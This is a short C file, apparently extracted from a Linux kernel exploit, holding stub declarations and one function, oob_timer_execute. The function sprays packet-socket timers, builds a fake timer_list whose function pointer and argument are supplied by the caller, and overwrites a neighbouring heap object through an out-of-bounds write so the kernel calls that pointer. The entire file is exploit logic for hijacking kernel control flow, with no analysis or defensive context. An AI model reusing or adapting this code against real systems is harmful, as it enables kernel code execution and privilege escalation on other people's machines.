
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct timer_list {unsigned long data; int flags; void* function; } ;
typedef int buffer ;


 scalar_t__ TIMER_OFFSET ;
 int memset (char*,int ,int) ;
 int oob_setup (scalar_t__) ;
 int oob_write (char*,int) ;
 int packet_sock_kmalloc () ;
 int packet_sock_timer_schedule (int,int) ;
 int sleep (int) ;

void oob_timer_execute(void *func, unsigned long arg) {
 oob_setup(2048 + TIMER_OFFSET - 8);

 int i;
 for (i = 0; i < 32; i++) {
  int timer = packet_sock_kmalloc();
  packet_sock_timer_schedule(timer, 1000);
 }

 char buffer[2048];
 memset(&buffer[0], 0, sizeof(buffer));

 struct timer_list *timer = (struct timer_list *)&buffer[8];
 timer->function = func;
 timer->data = arg;
 timer->flags = 1;

 oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);

 sleep(1);
}
